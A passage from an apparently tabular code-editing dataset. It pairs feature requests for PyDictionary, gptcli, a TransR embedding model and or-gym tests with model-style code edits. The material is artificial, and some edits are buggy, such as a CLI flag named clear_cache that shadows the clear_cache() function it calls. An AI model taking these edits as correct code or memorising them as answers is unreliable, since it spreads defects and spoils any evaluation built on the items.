re.findall(r\'\\((.*?)\\)\', reg):\n                        if \'often followed by\' in x:\n                            pass\n                        elif len(x) &gt; 5 or \' \' in str(x):\n                            meanings.append(x)\n                    name = a.text\n                    out[name] = meanings\n                return out\n            except Exception as e:\n                if disable_errors == False:\n                    print("Error: The Following Error occured: %s" % e)\n\nif __name__ == \'__main__\':\n    d = PyDictionary(\'honest\',\'happy\')\n    d.printSynonyms()\n    # New: Display cache statistics\n    print("Cache Stats:", PyDictionary.getCacheStats())'}</t>
  </si>
  <si>
    <t>{'file_1': 'from __future__ import print_function\nimport sys, re, goslate\ntry:\n    from .utils import _get_soup_object\nexcept:\n    from utils import _get_soup_object\n\npython2 = False\nif list(sys.version_info)[0] == 2:\n    python2 = True\n\nclass PyDictionary(object):\n\n    def __init__(self, *args):\n        try:\n            if isinstance(args[0], list):\n                self.args = args[0]\n            else:\n                self.args = args\n        except:\n            self.args = args\n\n    def printMeanings(self):\n        dic = self.getMeanings()\n        for key in dic.keys():\n            print(key.capitalize() + \':\')\n            for k in dic[key].keys():\n                print(k + \':\')\n                for m in dic[key][k]:\n                    print(m)\n\n    def printAntonyms(self):\n        antonyms = dict(zip(self.args,self.getAntonyms(False)))\n        for word in antonyms:\n            print(word+\':\')\n            print(\', \'.join(antonyms[word]))\n\n    def printSynonyms(self):\n        synonyms = dict(zip(self.args,self.getSynonyms(False)))\n        for word in synonyms:\n            print(word+\':\')\n            print(\', \'.join(synonyms[word]))\n\n    def getMeanings(self):\n        out = {}\n        for term in self.args:\n            out[term] = self.meaning(term)\n        return out\n\n    def translateTo(self, language):\n        return [self.translate(term, language) for term in self.args]\n\n    def translate(self, term, language):\n        if len(term.split()) &gt; 1:\n            print("Error: A Term must be only a single word")\n        else:\n            try:\n                gs = goslate.Goslate()\n                word = gs.translate(term, language)\n                return word\n            except:\n                print("Invalid Word")\n\n    def getSynonyms(self, formatted=True):\n        return [self.synonym(term, formatted) for term in self.args]\n\n    def __repr__(self):\n        return "&lt;PyDictionary Object with {0} words&gt;".format(len(self.args))\n\n    def __getitem__(self, index):\n        return self.args[index]\n\n    def __eq__(self):\n        return self.args\n\n    def getAntonyms(self, formatted=True):\n        return [self.antonym(term, formatted) for term in self.args]\n\n    @staticmethod\n    def synonym(term, formatted=False):\n        if len(term.split()) &gt; 1:\n            print("Error: A Term must be only a single word")\n        else:\n            try:\n                data = _get_soup_object("https://www.synonym.com/synonyms/{0}".format(term))\n                section = data.find(\'div\', {\'class\': \'type-synonym\'})\n                spans = section.findAll(\'a\')\n                synonyms = [span.text.strip() for span in spans]\n                if formatted:\n                    return {term: synonyms}\n                return synonyms\n            except:\n                print("{0} has no Synonyms in the API".format(term))\n\n    @staticmethod\n    def antonym(term, formatted=False):\n        if len(term.split()) &gt; 1:\n            print("Error: A Term must be only a single word")\n        else:\n            try:\n                data = _get_soup_object("https://www.synonym.com/synonyms/{0}".format(term))\n                section = data.find(\'div\', {\'class\': \'type-antonym\'})\n                spans = section.findAll(\'a\')\n                antonyms = [span.text.strip() for span in spans]\n                if formatted:\n                    return {term: antonyms}\n                return antonyms\n            except:\n                print("{0} has no Antonyms in the API".format(term))\n\n    @staticmethod\n    def meaning(term, disable_errors=False):\n        if len(term.split()) &gt; 1:\n            print("Error: A Term must be only a single word")\n        else:\n            try:\n                html = _get_soup_object("http://wordnetweb.princeton.edu/perl/webwn?s={0}".format(\n                    term))\n                types = html.findAll("h3")\n                length = len(types)\n                lists = html.findAll("ul")\n                out = {}\n                for a in types:\n                    reg = str(lists[types.index(a)])\n                    meanings = []\n                    for x in re.findall(r\'\\((.*?)\\)\', reg):\n                        if \'often followed by\' in x:\n                            pass\n                        elif len(x) &gt; 5 or \' \' in str(x):\n                            meanings.append(x)\n                    name = a.text\n                    out[name] = meanings\n                return out\n            except Exception as e:\n                if disable_errors == False:\n                    print("Error: The Following Error occured: %s" % e)\n\nif __name__ == \'__main__\':\n    d = PyDictionary(\'honest\',\'happy\')\n    d.printSynonyms()\n', 'file_2': 'import requests\nfrom bs4 import BeautifulSoup\n\n#Modify\ndef _get_soup_object(url, parser="html.parser"):\n    cache = getattr(_get_soup_object, \'cache\', {})\n    if url in cache:\n        return cache[url]\n    soup = BeautifulSoup(requests.get(url).text, parser)\n    cache[url] = soup\n    _get_soup_object.cache = cache\n    return soup\n\n#New\ndef clear_cache():\n    _get_soup_object.cache = {}\n', 'file_3': 'import click\ntry:\n    from .core import *\nexcept:\n    from core import *\n\n@click.command()\n@click.option(\'--mode\',\'-m\',default="meaning",help="Mode of Script [meaning, antonym, synonym]")\n@click.option(\'--words\', \'-w\',prompt="Enter words in a string separated by commas")\n@click.option(\'--clear-cache\', \'-c\', is_flag=True, help="Clear the cache before running the script")\ndef script(words,mode,clear_cache):\n    print("PyDictionary:")\n    if clear_cache:\n        clear_cache()\n    word_values = [w.strip() for w in words.split(\',\')]\n    d = PyDictionary(word_values)\n    maps = {"meaning":d.printMeanings,"antonym":d.printAntonyms,"synonym":d.printSynonyms}\n    click.echo(maps[mode]())\n'}</t>
  </si>
  <si>
    <t>{'called_code_segment': 'AnthropicCompletionProvider.complete() method in gptcli/providers/anthropic.py', 'invoking_code_segment': 'Assistant.complete_chat() method in gptcli/assistant.py which calls completion_provider.complete()', 'feature_description': "Add a feature to allow users to specify custom stop sequences for chat completion. This enables users to define custom stopping points for the model's response generation, providing more control over output termination.", 'modified_complete_code': '# File 1: gptcli/providers/anthropic.py\n\nimport os\nfrom typing import Iterator, List, Optional\nimport anthropic\n\nfrom gptcli.completion import (\n    CompletionEvent,\n    CompletionProvider,\n    Message,\n    CompletionError,\n    BadRequestError,\n    MessageDeltaEvent,\n    Pricing,\n    UsageEvent,\n)\n\napi_key = os.environ.get("ANTHROPIC_API_KEY")\n\n\ndef get_client():\n    if not api_key:\n        raise ValueError("ANTHROPIC_API_KEY environment variable not set")\n\n    return anthropic.Anthropic(api_key=api_key)\n\n\nclass AnthropicCompletionProvider(CompletionProvider):\n    def complete(\n        self, messages: List[Message], args: dict, stream: bool = False\n    ) -&gt; Iterator[CompletionEvent]:\n        # #Modify: Initialize stop_sequences with default and custom values\n        stop_sequences = [anthropic.HUMAN_PROMPT]\n        if "stop_sequences" in args and args["stop_sequences"]:\n            if isinstance(args["stop_sequences"], list):\n                stop_sequences.extend(args["stop_sequences"])\n            else:\n                stop_sequences.append(args["stop_sequences"])\n        \n        kwargs = {\n            "stop_sequences": stop_sequences,\n            "max_tokens": 4096,\n            "model": args["model"],\n        }\n\n        if "temperature" in args:\n            kwargs["temperature"] = args["temperature"]\n        if "top_p" in args:\n            kwargs["top_p"] = args["top_p"]\n\n        if len(messages) &gt; 0 and messages[0]["role"] == "system":\n            kwargs["system"] = messages[0]["content"]\n            messages = messages[1:]\n\n        kwargs["messages"] = messages\n\n        client = get_client()\n        input_tokens = None\n        try:\n            if stream:\n                with client.messages.stream(**kwargs) as completion:\n                    for event in completion:\n                        if event.type == "content_block_delta":\n                            yield MessageDeltaEvent(event.delta.text)\n                        if event.type == "message_start":\n                            input_tokens = event.message.usage.input_tokens\n                        if (\n                            event.type == "message_delta"\n                            and (pricing := claude_pricing(args["model"]))\n                            and input_tokens\n                        ):\n                            yield UsageEvent.with_pricing(\n                                prompt_tokens=input_tokens,\n                                completion_tokens=event.usage.output_tokens,\n                                total_tokens=input_tokens + event.usage.output_tokens,\n                                pricing=pricing,\n                            )\n\n            else:\n                response = client.messages.create(**kwargs, stream=False)\n                yield MessageDeltaEvent("".join(c.text for c in response.content))\n                if pricing := claude_pricing(args["model"]):\n                    yield UsageEvent.with_pricing(\n                        prompt_tokens=response.usage.input_tokens,\n                        completion_tokens=response.usage.output_tokens,\n                        total_tokens=response.usage.input_tokens\n                        + response.usage.output_tokens,\n                        pricing=pricing,\n                    )\n        except anthropic.BadRequestError as e:\n            raise BadRequestError(e.message) from e\n        except anthropic.APIError as e:\n            raise CompletionError(e.message) from e\n\n\nCLAUDE_PRICE_PER_TOKEN: Pricing = {\n    "prompt": 11.02 / 1_000_000,\n    "response": 32.68 / 1_000_000,\n}\n\nCLAUDE_INSTANT_PRICE_PER_TOKEN: Pricing = {\n    "prompt": 1.63 / 1_000_000,\n    "response": 5.51 / 1_000_000,\n}\n\nCLAUDE_3_OPUS_PRICING: Pricing = {\n    "prompt": 15.0 / 1_000_000,\n    "response": 75.0 / 1_000_000,\n}\n\nCLAUDE_3_SONNET_PRICING: Pricing = {\n    "prompt": 3.0 / 1_000_000,\n    "response": 15.0 / 1_000_000,\n}\n\nCLAUDE_3_HAIKU_PRICING: Pricing = {\n    "prompt": 0.25 / 1_000_000,\n    "response": 1.25 / 1_000_000,\n}\n\n\ndef claude_pricing(model: str) -&gt; Optional[Pricing]:\n    if "instant" in model:\n        pricing = CLAUDE_INSTANT_PRICE_PER_TOKEN\n    elif "claude-3" in model:\n        if "opus" in model:\n            pricing = CLAUDE_3_OPUS_PRICING\n        elif "sonnet" in model:\n            pricing = CLAUDE_3_SONNET_PRICING\n        elif "haiku" in model:\n            pricing = CLAUDE_3_HAIKU_PRICING\n        else:\n            return None\n    elif "claude-2" in model:\n        pricing = CLAUDE_PRICE_PER_TOKEN\n    else:\n        return None\n    return pricing\n\n# File 2: gptcli/assistant.py\n\nimport os\nimport sys\nfrom attr import dataclass\nimport platform\nfrom typing import Any, Dict, Iterator, Optional, TypedDict, List\n\nfrom gptcli.completion import (\n    CompletionEvent,\n    CompletionProvider,\n    ModelOverrides,\n    Message,\n)\nfrom gptcli.providers.google import GoogleCompletionProvider\nfrom gptcli.providers.llama import LLaMACompletionProvider\nfrom gptcli.providers.openai import OpenAICompletionProvider\nfrom gptcli.providers.anthropic import AnthropicCompletionProvider\nfrom gptcli.providers.cohere import CohereCompletionProvider\n\n\nclass AssistantConfig(TypedDict, total=False):\n    messages: List[Message]\n    model: str\n    temperature: float\n    top_p: float\n    # #New: Add stop_sequences to AssistantConfig\n    stop_sequences: Optional[List[str]]\n\n\nCONFIG_DEFAULTS = {\n    "model": "gpt-3.5-turbo",\n    "temperature": 0.7,\n    "top_p": 1.0,\n    # #New: Add default stop_sequences\n    "stop_sequences": None,\n}\n\nDEFAULT_ASSISTANTS: Dict[str, AssistantConfig] = {\n    "dev": {\n        "messages": [\n            {\n                "role": "system",\n                "content": f"You are a helpful assistant who is an expert in software development. \\\nYou are helping a user who is a software developer. Your responses are short and concise. \\\nYou include code snippets when appropriate. Code snippets are formatted using Markdown \\\nwith a correct language tag. User\'s `uname`: {platform.uname()}",\n            },\n            {\n                "role": "user",\n                "content": "Your responses must be short and concise. Do not include explanations unless asked.",\n            },\n            {\n                "role": "assistant",\n                "content": "Understood.",\n            },\n        ],\n    },\n    "general": {\n        "messages": [],\n    },\n    "bash": {\n        "messages": [\n            {\n                "role": "system",\n                "content": f"You output only valid and correct shell commands according to the user\'s prompt. \\\nYou don\'t provide any explanations or any other text that is not valid shell commands. \\\nUser\'s `uname`: {platform.uname()}. User\'s `$SHELL`: {os.environ.get(\'SHELL\')}.",\n            }\n        ],\n    },\n}\n\n\ndef get_completion_provider(model: str) -&gt; CompletionProvider:\n    if (\n        model.startswith("gpt")\n        or model.startswith("ft:gpt")\n        or model.startswith("oai-compat:")\n        or model.startswith("chatgpt")\n        or model.startswith("o1")\n    ):\n        return OpenAICompletionProvider()\n    elif model.startswith("claude"):\n        return AnthropicCompletionProvider()\n    elif model.startswith("llama"):\n        return LLaMACompletionProvider()\n    elif model.startswith("command") or model.startswith("c4ai"):\n        return CohereCompletionProvider()\n    elif model.startswith("gemini"):\n        return GoogleCompletionProvider()\n    else:\n        raise ValueError(f"Unknown model: {model}")\n\n\nclass Assistant:\n    def __init__(self, config: AssistantConfig):\n        self.config = config\n\n    @classmethod\n    def from_config(cls, name: str, config: AssistantConfig):\n        config = config.copy()\n        if name in DEFAULT_ASSISTANTS:\n            # Merge the config with the default config\n            # If a key is in both, use the value from the config\n            default_config = DEFAULT_ASSISTANTS[name]\n            for key in [*config.keys(), *default_config.keys()]:\n                if config.get(key) is None:\n                    config[key] = default_config[key]\n\n        return cls(config)\n\n    def init_messages(self) -&gt; List[Message]:\n        return self.config.get("messages", [])[:]\n\n    def supported_overrides(self) -&gt; List[str]:\n        # #Modify: Add stop_sequences to supported overrides\n        return ["model", "temperature", "top_p", "stop_sequences"]\n\n    def _param(self, param: str, override_params: ModelOverrides) -&gt; Any:\n        # If the param is in the override_params, use that value\n        # Otherwise, use the value from the config\n        # Otherwise, use the default value\n        return override_params.get(\n            param, self.config.get(param, CONFIG_DEFAULTS.get(param))\n        )\n\n    def complete_chat(\n        self, messages, override_params: ModelOverrides = {}, stream: bool = True\n    ) -&gt; Iterator[CompletionEvent]:\n        model = self._param("model", override_params)\n        completion_provider = get_completion_provider(model)\n        # #Modify: Include stop_sequences in the completion parameters\n        completion_args = {\n            "model": model,\n            "temperature": float(self._param("temperature", override_params)),\n            "top_p": float(self._param("top_p", override_params)),\n        }\n        # #New: Add stop_sequences to completion args if provided\n        stop_sequences = self._param("stop_sequences", override_params)\n        if stop_sequences is not None:\n            completion_args["stop_sequences"] = stop_sequences\n        \n        return completion_provider.complete(\n            messages,\n            completion_args,\n            stream,\n        )\n\n\n@dataclass\nclass AssistantGlobalArgs:\n    assistant_name: str\n    model: Optional[str] = None\n    temperature: Optional[float] = None\n    top_p: Optional[float] = None\n    # #New: Add stop_sequences to AssistantGlobalArgs\n    stop_sequences: Optional[List[str]] = None\n\n\ndef init_assistant(\n    args: AssistantGlobalArgs, custom_assistants: Dict[str, AssistantConfig]\n) -&gt; Assistant:\n    name = args.assistant_name\n    if name in custom_assistants:\n        assistant = Assistant.from_config(name, custom_assistants[name])\n    elif name in DEFAULT_ASSISTANTS:\n        assistant = Assistant.from_config(name, DEFAULT_ASSISTANTS[name])\n    else:\n        print(f"Unknown assistant: {name}")\n        sys.exit(1)\n\n    # Override config with command line arguments\n    if args.temperature is not None:\n        assistant.config["temperature"] = args.temperature\n    if args.model is not None:\n        assistant.config["model"] = args.model\n    if args.top_p is not None:\n        assistant.config["top_p"] = args.top_p\n    # #New: Add stop_sequences override\n    if args.stop_sequences is not None:\n        assistant.config["stop_sequences"] = args.stop_sequences\n    return assistant'}</t>
  </si>
  <si>
    <t>{'#file 1': 'def complete_chat(self, messages, override_params: ModelOverrides = {}, stream: bool = True, stop_sequence: Optional[str] = None) -&gt; Iterator[CompletionEvent]:  #Modify\n    model = self._param("model", override_params)\n    completion_provider = get_completion_provider(model)\n    return completion_provider.complete(\n        messages,\n        {\n            "model": model,\n            "temperature": float(self._param("temperature", override_params)),\n            "top_p": float(self._param("top_p", override_params)),\n            "stop_sequence": stop_sequence,  #New\n        },\n        stream,\n    )', '#file 2': 'def simple_response(assistant, prompt, stream=True, stop_sequence=None):  #Modify\n    messages = assistant.init_messages()\n    messages.append({"role": "user", "content": prompt})\n    for event in assistant.complete_chat(messages, stream=stream, stop_sequence=stop_sequence):  #Modify\n        if isinstance(event, MessageDeltaEvent):\n            print(event.delta, end="", flush=True)', '#file 3': 'def run_non_interactive(args, assistant):\n    logger.info(\n        "Starting a non-interactive session with prompt \'%s\'. Assistant config: %s",\n        args.prompt,\n        assistant.config,\n    )\n    if "-" in args.prompt:\n        args.prompt[args.prompt.index("-")] = "".join(sys.stdin.readlines())\n\n    stop_sequence = args.stop_sequence if hasattr(args, \'stop_sequence\') else None  #New\n    simple_response(assistant, "\\n".join(args.prompt), stream=not args.no_stream, stop_sequence=stop_sequence)  #Modify'}</t>
  </si>
  <si>
    <t>{'called_code_segment': 'def projection_transR_pytorch(original, proj_matrix):\n\tent_embedding_size = original.shape[1]\n\trel_embedding_size = proj_matrix.shape[1] // ent_embedding_size\n\toriginal = original.view(-1, ent_embedding_size, 1)\n\tproj_matrix = proj_matrix.view(-1, rel_embedding_size, ent_embedding_size)\n\treturn torch.matmul(proj_matrix, original).view(-1, rel_embedding_size)', 'invoking_code_segment': "proj_t_e = projection_transR_pytorch(t_e, this_proj_emb)\n\tc_h_e = proj_t_e - r_e\n\tc_h_e = c_h_e.cpu().numpy()\n\nif L1_flag == True:\n\tdist = pairwise_distances(c_h_e, this_proj_all_e, metric='manhattan')\nelse:\n\tdist = pairwise_distances(c_h_e, this_proj_all_e, metric='euclidean')\n\nrankArrayHead = np.argsort(dist, axis=1)", 'feature_description': 'Add a new feature to normalize the projection matrix before applying it in the projection_transR_pytorch function. This ensures that the projection matrices have unit Frobenius norm, which can improve the stability and performance of the TransR model during knowledge graph embedding.', 'modified_complete_code': '# File 1: knowledge_representation_pytorch/projection.py\n\ndef projection_transR_pytorch(original, proj_matrix):\n\tent_embedding_size = original.shape[1]\n\trel_embedding_size = proj_matrix.shape[1] // ent_embedding_size\n\toriginal = original.view(-1, ent_embedding_size, 1)\n\tproj_matrix = proj_matrix.view(-1, rel_embedding_size, ent_embedding_size)\n\t#Modify: Normalize the projection matrix by Frobenius norm\n\tproj_matrix_norm = torch.norm(proj_matrix, p=\'fro\', dim=(1, 2), keepdim=True)\n\tproj_matrix_norm = torch.clamp(proj_matrix_norm, min=1e-8)\n\tproj_matrix = proj_matrix / proj_matrix_norm\n\treturn torch.matmul(proj_matrix, original).view(-1, rel_embedding_size)\n\n#New: Add helper function to normalize projection embeddings\ndef normalize_proj_matrix(proj_embeddings, ent_embedding_size):\n\t"""Normalize projection matrices to unit Frobenius norm."""\n\trel_embedding_size = proj_embeddings.shape[1] // ent_embedding_size\n\tproj_matrix = proj_embeddings.view(-1, rel_embedding_size, ent_embedding_size)\n\tproj_matrix_norm = torch.norm(proj_matrix, p=\'fro\', dim=(1, 2), keepdim=True)\n\tproj_matrix_norm = torch.clamp(proj_matrix_norm, min=1e-8)\n\tproj_matrix = proj_matrix / proj_matrix_norm\n\treturn proj_matrix.view(-1, rel_embedding_size * ent_embedding_size)\n\n# File 2: knowledge_representation_pytorch/evaluation.py\n# In evaluation_transR_helper function, modify the projection application:\n\ndef evaluation_transR_helper(testList, tripleDict, ent_embeddings, \n\trel_embeddings, proj_embeddings, L1_flag, filter, head):\n\theadList = [triple.h for triple in testList]\n\ttailList = [triple.t for triple in testList]\n\trelList = [triple.r for triple in testList]\n\n\th_e = ent_embeddings[headList]\n\tt_e = ent_embeddings[tailList]\n\tr_e = rel_embeddings[relList]\n\tthis_rel = relList[0]\n\tthis_proj_emb = proj_embeddings[[this_rel]]\n\t#Modify: Normalize projection embeddings before applying projection\n\tent_embedding_size = ent_embeddings.shape[1]\n\tthis_proj_emb_normalized = normalize_proj_matrix(this_proj_emb, ent_embedding_size)\n\tthis_proj_all_e = projection_transR_pytorch(ent_embeddings, this_proj_emb_normalized)\n\tthis_proj_all_e = this_proj_all_e.cpu().numpy()\n\n\tif head == 1:\n\t\tproj_t_e = projection_transR_pytorch(t_e, this_proj_emb_normalized)\n\t\tc_h_e = proj_t_e - r_e\n\t\tc_h_e = c_h_e.cpu().numpy()\n\n\t\tif L1_flag == True:\n\t\t\tdist = pairwise_distances(c_h_e, this_proj_all_e, metric=\'manhattan\')\n\t\telse:\n\t\t\tdist = pairwise_distances(c_h_e, this_proj_all_e, metric=\'euclidean\')\n\n\t\trankArrayHead = np.argsort(dist, axis=1)\n\t\tif filter == False:\n\t\t\trankListHead = [int(np.argwhere(elem[1]==elem[0])) for elem in zip(headList, rankArrayHead)]\n\t\telse:\n\t\t\trankListHead = [argwhereHead(elem[0], elem[1], elem[2], elem[3], tripleDict) \n\t\t\t\t\t\t\tfor elem in zip(headList, tailList, relList, rankArrayHead)]\n\n\t\tisHit10ListHead = [x for x in rankListHead if x &lt; 10]\n\n\t\ttotalRank = sum(rankListHead)\n\t\thit10Count = len(isHit10ListHead)\n\t\ttripleCount = len(rankListHead)\n\n\telif head == 2:\n\t\tproj_h_e = projection_transR_pytorch(h_e, this_proj_emb_normalized)\n\t\tc_t_e = proj_h_e + r_e\n\t\tc_t_e = c_t_e.cpu().numpy()\n\n\t\tif L1_flag == True:\n\t\t\tdist = pairwise_distances(c_t_e, this_proj_all_e, metric=\'manhattan\')\n\t\telse:\n\t\t\tdist = pairwise_distances(c_t_e, this_proj_all_e, metric=\'euclidean\')\n\n\t\trankArrayTail = np.argsort(dist, axis=1)\n\t\tif filter == False:\n\t\t\trankListTail = [int(np.argwhere(elem[1]==elem[0])) for elem in zip(tailList, rankArrayTail)]\n\t\telse:\n\t\t\trankListTail = [argwhereTail(elem[0], elem[1], elem[2], elem[3], tripleDict) \n\t\t\t\t\t\t\tfor elem in zip(headList, tailList, relList, rankArrayTail)]\n\n\t\tisHit10ListTail = [x for x in rankListTail if x &lt; 10]\n\n\t\ttotalRank = sum(rankListTail)\n\t\thit10Count = len(isHit10ListTail)\n\t\ttripleCount = len(rankListTail)\n\n\telse:\n\t\tproj_h_e = projection_transR_pytorch(h_e, this_proj_emb_normalized)\n\t\tc_t_e = proj_h_e + r_e\n\t\tproj_t_e = projection_transR_pytorch(t_e, this_proj_emb_normalized)\n\t\tc_h_e = proj_t_e - r_e\n\n\t\tc_t_e = c_t_e.cpu().numpy()\n\t\tc_h_e = c_h_e.cpu().numpy()\n\n\t\tif L1_flag == True:\n\t\t\tdist = pairwise_distances(c_t_e, this_proj_all_e, metric=\'manhattan\')\n\t\telse:\n\t\t\tdist = pairwise_distances(c_t_e, this_proj_all_e, metric=\'euclidean\')\n\n\t\trankArrayTail = np.argsort(dist, axis=1)\n\t\tif filter == False:\n\t\t\trankListTail = [int(np.argwhere(elem[1]==elem[0])) for elem in zip(tailList, rankArrayTail)]\n\t\telse:\n\t\t\trankListTail = [argwhereTail(elem[0], elem[1], elem[2], elem[3], tripleDict) \n\t\t\t\t\t\t\tfor elem in zip(headList, tailList, relList, rankArrayTail)]\n\n\t\tisHit10ListTail = [x for x in rankListTail if x &lt; 10]\n\n\t\tif L1_flag == True:\n\t\t\tdist = pairwise_distances(c_h_e, this_proj_all_e, metric=\'manhattan\')\n\t\telse:\n\t\t\tdist = pairwise_distances(c_h_e, this_proj_all_e, metric=\'euclidean\')\n\n\t\trankArrayHead = np.argsort(dist, axis=1)\n\t\tif filter == False:\n\t\t\trankListHead = [int(np.argwhere(elem[1]==elem[0])) for elem in zip(headList, rankArrayHead)]\n\t\telse:\n\t\t\trankListHead = [argwhereHead(elem[0], elem[1], elem[2], elem[3], tripleDict) \n\t\t\t\t\t\t\tfor elem in zip(headList, tailList, relList, rankArrayHead)]\n\n\t\tisHit10ListHead = [x for x in rankListHead if x &lt; 10]\n\n\t\ttotalRank = sum(rankListTail) + sum(rankListHead)\n\t\thit10Count = len(isHit10ListTail) + len(isHit10ListHead)\n\t\ttripleCount = len(rankListTail) + len(rankListHead)\n\n\treturn hit10Count, totalRank, tripleCount'}</t>
  </si>
  <si>
    <t>{'file_1': 'def projection_transR_pytorch(original, proj_matrix):\n    #Modify: Normalize the projection matrix\n    proj_matrix = F.normalize(proj_matrix, p=2, dim=1)\n    ent_embedding_size = original.shape[1]\n    rel_embedding_size = proj_matrix.shape[1] // ent_embedding_size\n    original = original.view(-1, ent_embedding_size, 1)\n    proj_matrix = proj_matrix.view(-1, rel_embedding_size, ent_embedding_size)\n    return torch.matmul(proj_matrix, original).view(-1, rel_embedding_size)', 'file_2': 'def forward(self, pos_h_batch, pos_t_batch, pos_r_batch, neg_h_batch, neg_t_batch, neg_r_batch):\n    pos_h_e = self.ent_embeddings(pos_h_batch)\n    pos_t_e = self.ent_embeddings(pos_t_batch)\n    pos_r_e = self.rel_embeddings(pos_r_batch)\n    neg_h_e = self.ent_embeddings(neg_h_batch)\n    neg_t_e = self.ent_embeddings(neg_t_batch)\n    neg_r_e = self.rel_embeddings(neg_r_batch)\n    pos_h_e = projection_transR_pytorch(pos_h_e, self.proj_embeddings(pos_r_batch))\n    pos_t_e = projection_transR_pytorch(pos_t_e, self.proj_embeddings(pos_r_batch))\n    neg_h_e = projection_transR_pytorch(neg_h_e, self.proj_embeddings(neg_r_batch))\n    neg_t_e = projection_transR_pytorch(neg_t_e, self.proj_embeddings(neg_r_batch))\n    pos = torch.sum(torch.abs(pos_h_e + pos_r_e - pos_t_e), 1)\n    neg = torch.sum(torch.abs(neg_h_e + neg_r_e - neg_t_e), 1)\n    return pos, neg, pos_h_e, pos_t_e, neg_h_e, neg_t_e', 'file_3': 'def evaluation_transR_helper(testList, tripleDict, ent_embeddings, rel_embeddings, proj_embeddings, L1_flag, filter, head):\n    headList = [triple.h for triple in testList]\n    tailList = [triple.t for triple in testList]\n    relList = [triple.r for triple in testList]\n    h_e = ent_embeddings[headList]\n    t_e = ent_embeddings[tailList]\n    r_e = rel_embeddings[relList]\n    this_rel = relList[0]\n    this_proj_emb = proj_embeddings[[this_rel]]\n    this_proj_all_e = projection_transR_pytorch(ent_embeddings, this_proj_emb)\n    this_proj_all_e = this_proj_all_e.cpu().numpy()', 'new_code_file_3': 'def evaluation_transR(testList, tripleDict, ent_embeddings, rel_embeddings, proj_embeddings, L1_flag, filter, k=0, num_processes=multiprocessing.cpu_count(), head=0):\n    if k &gt; len(testList):\n        testList = random.choices(testList, k=k)\n    elif k &gt; 0:\n        testList = random.sample(testList, k=k)\n    testList.sort(key=lambda x: (x.r, x.h, x.t))\n    grouped = [(k, list(g)) for k, g in groupby(testList, key=getRel)]\n    ent_embeddings = ent_embeddings.cpu()\n    rel_embeddings = rel_embeddings.cpu()\n    proj_embeddings = proj_embeddings.cpu()\n    with multiprocessing.Manager() as manager:\n        L = manager.list()\n        queue = multiprocessing.JoinableQueue()\n        workerList = []\n        for i in range(num_processes):\n            worker = MyProcessTransR(L, tripleDict, ent_embeddings, rel_embeddings, proj_embeddings, L1_flag, filter, queue=queue, head=head)\n            workerList.append(worker)\n            worker.daemon = True\n            worker.start()\n        for k, subList in grouped:\n            queue.put(subList)\n        queue.join()\n        resultList = list(L)\n        for worker in workerList:\n            worker.terminate()'}</t>
  </si>
  <si>
    <t>{'called_code_segment': 'or_gym.make(env_name) in or_gym/__init__.py which imports make from gym.envs', 'invoking_code_segment': 'self._build_env(env_name) method in tests/env_test.py that calls or_gym.make(env_name)', 'feature_description': 'Add a feature to log the environment name and episode number during testing to provide better visibility into test execution and debugging information.', 'modified_complete_code': '# File: or-gym/or_gym/__init__.py\nimport os\nimport sys\nimport warnings\nimport logging\n\nfrom gym import error\nfrom or_gym.version import VERSION as __version__\nfrom or_gym.utils import *\n\nfrom gym.core import Env, Wrapper, ObservationWrapper, ActionWrapper, RewardWrapper\nfrom gym.envs import make as gym_make, spec, register\nfrom or_gym.envs import classic_or, finance, supply_chain\n\n# New: Setup logger for environment tracking\nlogger = logging.getLogger(\'or_gym\')\n\n# New: Wrapper function to log environment creation\ndef make(env_name, **kwargs):\n    """Create environment with logging support."""\n    logger.info(f\'Creating environment: {env_name}\')\n    return gym_make(env_name, **kwargs)\n\n---\n\n# File: or-gym/tests/env_test.py\n#!/usr/bin/env python\n\n\'\'\'\nTests to ensure environments load and basic functionality\nis satisfied.\n\'\'\'\n\nimport or_gym\nfrom or_gym.envs.env_list import ENV_LIST\nimport traceback\nimport logging\n\n# New: Setup logging for test execution\nlogging.basicConfig(level=logging.INFO, format=\'%(asctime)s - %(name)s - %(levelname)s - %(message)s\')\ntest_logger = logging.getLogger(\'or_gym_test\')\n\ndef pytest_generate_tests(metafunc):\n    idlist = []\n    argvalues = []\n    for scenario in metafunc.cls.scenarios:\n        idlist.append(scenario[0])\n        items = scenario[1].items()\n        argnames = [x[0] for x in items]\n        argvalues.append([x[1] for x in items])\n    metafunc.parametrize(argnames, argvalues, ids=idlist, scope="class")\n\nclass TestEnv:\n    scenarios = [(i, {\'config\': {\'env_name\': i}}) for i in ENV_LIST]\n\n    def _build_env(self, env_name):\n        # Modify: Add logging for environment creation\n        test_logger.info(f\'Building environment: {env_name}\')\n        env = or_gym.make(env_name)\n        return env\n\n    def test_make(self, config):\n        # Ensures that environments are instantiated\n        env_name = config[\'env_name\']\n        # New: Log test start\n        test_logger.info(f\'Starting test_make for environment: {env_name}\')\n        try:\n            _ = self._build_env(env_name)\n            success = True\n        except Exception as e:\n            tb = e.__traceback__\n            success = False\n            # New: Log failure\n            test_logger.error(f\'Failed to create environment {env_name}: {str(e)}\')\n        assert success, \'\'.join(traceback.format_tb(tb))\n\n    def test_episode(self, config):\n        # Run 100 episodes and check observation space\n        env_name = config[\'env_name\']\n        EPISODES = 100\n        # New: Log test start\n        test_logger.info(f\'Starting test_episode for environment: {env_name}\')\n        env = self._build_env(env_name)\n        for ep in range(EPISODES):\n            # New: Log episode number\n            test_logger.debug(f\'Environment: {env_name}, Episode: {ep + 1}/{EPISODES}\')\n            state = env.reset()\n            while True:\n                assert env.observation_space.contains(state), \\\n                    f"State out of range of observation space: {state}"\n                action = env.action_space.sample()\n                state, reward, done, info = env.step(action)\n                if done:\n                    break\n        \n        # New: Log test completion\n        test_logger.info(f\'Completed test_episode for environment: {env_name}\')\n        assert done'}</t>
  </si>
  <si>
    <t>{'or-gym/tests/env_test.py': '#Modify\n    def _build_env(self, env_name, episode=None):\n        env = or_gym.make(env_name)\n        if episode is not None:\n            print(f"Environment: {env_name}, Episode: {episode}")\n        return env\n\n#Modify\n    def test_episode(self, config):\n        # Run 100 episodes and check observation space\n        env_name = config[\'env_name\']\n        EPISODES = 100\n        for ep in range(EPISODES):\n            env = self._build_env(env_name, ep)\n            state = env.reset()\n            while True:\n                assert env.observation_space.contains(state), \\\n                    f"State out of range of observation space: {state}"\n                action = env.action_space.sample()\n                state, reward, done, info = env.step(action)\n                if done:\n                    break\n        \n        assert done', 'or-gym/or_gym/__init__.py': '#Modify\nfrom or_gym.envs import classic_or, finance, supply_chain\n\n#New\ndef make(env_name, **kwargs):\n    return classic_or.make(env_name, **kwargs) or \\\n           